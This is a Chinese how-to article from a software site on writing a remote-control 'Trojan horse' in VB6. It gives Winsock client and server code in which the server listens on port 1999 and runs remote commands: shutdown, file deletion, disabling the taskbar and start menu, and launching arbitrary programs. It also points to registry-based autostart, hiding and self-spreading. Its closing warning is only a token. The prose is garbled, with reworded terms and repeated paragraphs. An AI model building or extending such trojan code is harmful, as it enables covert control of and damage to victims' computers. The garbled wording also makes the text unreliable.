用VB6.0编写“特洛伊木马”程序pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范用VB6.0编写“特洛伊木马”程序

用VB6.0编写“特洛伊木马”程序


2009/3/2  编辑:佚名 来源:本站整理  关键词:

用VB6.0编写“特洛伊木马”程序

 

“特洛伊木马”有被称为BO, 是就在美国(美利坚和众国)一次黑客技术讨论会上由一个黑客组织推出的。 它其实是一种客户机/服务器程序, 其利用的原理就是:就在本机直接启动运行的程序拥有与使用者相同的权限。 因此如果能够启动服务器端(即被攻击的电脑计算机)的服务器程序, 就可以能够使用相应的客户端必备工具客户程序直接控制它了。 下面来谈谈怎么才能用VB来实现它。

  使用VB建立两个程序, 一个为客户端程序Client, 一个为服务器端程序systry。

   就在Client工程中建立一个窗体, 加载WinSock控件, 称为tcpClient, 协议选择中TCP, 再加入两个文本框, 用以输入服务器的IP地址或服务器名, 之后建立一个按钮按键, 按下之后就可以能够对连载来进行初始化了, 代码如下:


Private Sub cmdConnect_Click()
  If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then
   MsgBox ("请输入主机名或主机IP地址。 ")
   Exit Sub
  Else
   If Len(Text1.Text) > 0 Then
    tcpClient.RemoteHost = Text1.Text
   Else
    tcpClient.RemoteHost = Text2.Text
   End If
  End If
  tcpClient.Connect
  Timer1.Enabled = True
End Sub

  连载建立之后就可以能够使用DataArrival事件处理所收到的数据信息了。

  连载建立之后就可以能够使用DataArrival事件处理所收到的数据信息了。

  就在服务器端systry工程也建立一个窗体, 加载WinSock控件, 称为tcpServer, 协议选择中TCP, 就在Form_Load事件中加入如下代码:


Private Sub Form_Load()
  tcpServer.LocalPort = 1999
  tcpServer.Listen
End Sub

  预先安排准备应答客户端程序的请求连载, 使用ConnectionRequest事件来应答户端程序的请求, 代码如下:


Private Sub tcpServer_ConnectionRequest
(ByVal requestID As Long)
  If tcpServer.State < > sckClosed Then
   tcpServer.Close‘检查控件的 State 属性是否为关闭的。
  End If ’如果不是, 就在接受新的连载之前先关闭此连载。
  tcpServer.Accept requestID
End Sub

  这样就在客户端程序按下了连载按钮按键后, 服务器端程序的ConnectionRequest事件被触发, 执行了上面的代码。 如果不出意外, 连载就被建立起来了。

  建立连载后服务器端的程序可以通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。 如:把服务器端的驱动器名、目录名、文件程序名等传到客户机端, 客户机端接收后用TreeView控件以树状的形式显示出来, 浏览服务器端文件程序目录;强制关闭或重新启动服务器端的电脑计算机;屏蔽任务栏窗口;屏蔽现在开始菜单;按照客户机端传过来的文件程序名或目录名, 而删除它;屏蔽热启动键;运行服务器端的任意一个程序;还包括获取目标电脑计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标电脑计算机鼠标的移动与动作;交换远端鼠标的左右键;就在目标电脑计算机模拟键盘输入, 下载、上装文件程序;提取、建造、修改目标电脑计算机系统system注册表关键字;就在远端屏幕上显示消息。 DataArrival事件程序如下:


Private Sub tcpServer_DataArrival
(ByVal bytesTotal As Long)

  Dim strData As String
  Dim i As Long
  Dim mKey As String

  tcpServer.GetData strData
  ‘接收数据信息并存入strData
  For i = 1 To Len(strData)
   ‘分离strData中的命令
   If Mid(strData, i, 1) = "@" Then
    mKey = Left(strData, i - 1)
    ‘把命令ID号存入mKey

    ‘把命令参数存入strData
    strData = Right(strData, Len(strData) - i)
    Exit For
   End If
  Next i
  Select Case Val(mKey)
   Case 1
   ‘驱动器名、目录名、文件程序名
   Case 2
    强制关闭服务器端的电脑计算机
   Case 3
    强制重新启动服务器端的电脑计算机
   Case 4
    屏蔽任务栏窗口;
   Case 5
    屏蔽现在开始菜单;
   Case 6
    按照客户机端传过来的文件程序名或目录名, 而删除它;
   Case 7
    屏蔽热启动键;
   Case 8
    运行服务器端的任意一个程序
  End Select
End Sub

  详细程序略。

  客户机端用tcpClient.SendData发命令。 命令包括命令ID和命令参数, 它们用符号“@”隔开。

  另外, 当客户机端断开与服务器端的来接后, 服务器端应用tcpServer_Close事件, 来继续预先安排准备接收客户机端的请求, 其代码如下:


Private Sub tcpServer_Close()
tcpServer.Close
tcpServer.Listen
End Sub

  这就是一个最可以说是的特洛伊木马程序, 只要您的机器运行了服务器端程序, 那别人就可以能够就在千里之外控制您的电脑计算机。 至于怎么才能让服务器端程序运行就要发挥您的聪明才智了, 就在我的源程序中有一中方法, 是修改系统system注册表的方法。

  这就是一个最可以说是的特洛伊木马程序, 只要您的机器运行了服务器端程序, 那别人就可以能够就在千里之外控制您的电脑计算机。 至于怎么才能让服务器端程序运行就要发挥您的聪明才智了, 就在我的源程序中有一中方法, 是修改系统system注册表的方法。

  成功的特洛伊木马程序要比这个复杂一些, 还是有程序的隐藏、全自动复制、传播等问题要解决处理。 警告:千万一定不要用BO程序破坏别人的系统system。

相关文章
  • 搜狗输入法V模式的使用方法?搜狗输入法如何使用V模式教程
  • 不如做鸡!外国学者用VR科学养鸡
  • 工信部:未经批准不得自行建立或租用VPN
  • 首宗VR眼镜色情案告破,破获的利用VR眼镜传播淫秽视频
  • 怎么用VMware新建一个虚拟机,vmware软件怎么创建虚拟机
  • 使用VPN安全吗?
  • 利用VOLANS路由器防御内网ARP攻击
  • 用vb将vbs封装成exe
  • 用VB6.0编写“特洛伊木马”程序
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图